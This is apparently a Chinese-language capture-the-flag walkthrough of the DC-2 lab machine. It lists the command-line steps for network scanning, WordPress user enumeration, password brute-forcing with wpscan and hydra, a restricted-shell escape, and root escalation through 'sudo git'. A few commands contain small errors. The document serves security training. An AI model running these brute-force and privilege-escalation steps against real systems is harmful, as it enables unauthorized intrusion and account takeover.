arp-scan -l
nmap -sV -p- 192.168.109.140
也可以执行如下命令 可以探测目标主机是否存活
nmap -T4 -sP 192.168.109.140
也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下
nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt
想要访问可以进入如下目录
C:\Windows\System32\drivers\etc\hosts
kali中的hosts文件也需要修改 增加如下记录
/etc/hosts
进入网页后 这个
wordpress的cms网站 这个网站除去漏洞 还是非常优秀的
此时直接访问相应的ip地址就可以直接访问相应的网站了 输入dc-2也可以
修改完hosts文件 然后可以访问以后 接下来可以尝试对其进行扫描 -o表示可以输出到一个文件中 -h后面可以写能被解析的域名 也可以直接写ip地址
nikto -h dc-2 -o nihao.txt
发现了/wp-login.php 直接访问进入一个用户名和密码的登录位置
http://dc-2/wp-login.php
接下来我们需要扫描发现wordpress的用户
wpscan --url dc-2 -e u
(接下来是软件数据库更新问题的解决部分)
可以先下载包到本地
wget http://blog.dsb.ink/wpscan/wp.zip
mv wp.zip /var/www/html/
如果kali无法直接下载 可以windows直接访问
http://blog.dsb.ink/wpscan/wp.zip 再把这个文件放到/var/www/html下
cd /var/www/html
unzip wp.zip
dpkg -L wpscan | grep updater
/usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
vim /usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
按住shift+冒号 然后输入 set number回车 之后我们找到81行
之后我们改成本机地址
接下来重启服务
service apache2 start
然后再去更新 就可以更新成功了
wpscan --update
之后再继续刚才的操作
wpscan --url dc-2 -e u
扫描到了三个用户 admin jerry tom
根据flag1的提示 提示我们使用软件
cewl
会搜集可能的密码 行文习惯等
cewl dc-2 -w pass.txt
vi username.txt
此时用户名和密码都到位了
接下来可以
用工具 可以专门用来破解wordpress
其会自动定位到后台的登录地址
并进行穷举破解wordpress模板的用户名和密码
wpscan --url dc-2 -U username.txt -P pass.txt
其实也可以使用神器burpsuite进行破解
接下来我们可以通过账户和密码尝试进行登录
Tom的账户登录以后并没有什么内容 所以就不做演示了
接下来既然有字典 不妨再使用工具hydra对ssh的密码进行一下穷举破解 看会不会有意外收获
而且此时ssh的端口不是默认的22 已经被管理员修改了 所以需要-s指定端口
hydra -L username.txt -P pass.txt 192.168.109.140 ssh -s 7744
穷举成功获得ssh密码
接下来可以尝试登录ssh
ssh tom@192.168.109.140 -p 7744
ls
发现权限不够 连cat都用不了
接下来要尝试提权
echo $PATH #看一下自己是什么命令行
ls usr/bin #确定一下自己可以使用什么命令
vi flag3.txt
根据提示 接下来要使用su进行提权
以下命令 按下键盘的a 就可以调用/bin/sh命令行
BASH_CMDS[a]=/bin/sh
发现依然被禁用掉了
接下来可以使用终极命令: 把高级权限的命令行也加到自己的path中
此时就可以使用cat了
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
可以尝试提权到jerry
PS:经过尝试jerry的账户没有办法被直接ssh登录 但是通过tom的账户su后输入密码就可以成功切换账户
su jerry
#adipiscing
cd ~ #回到自己的home目录
sudo -l #查看可以以root权限使用什么命令
git提权 git在查看帮助文档的时候是可以敲命令的 在下面变白以后 命令前面加个感叹号即可
sudo git -p --help #这条命令有时候不能用
sudo git help config
此时已经提权到root了 可以执行root权限了
本质是借用git的root权限执行命令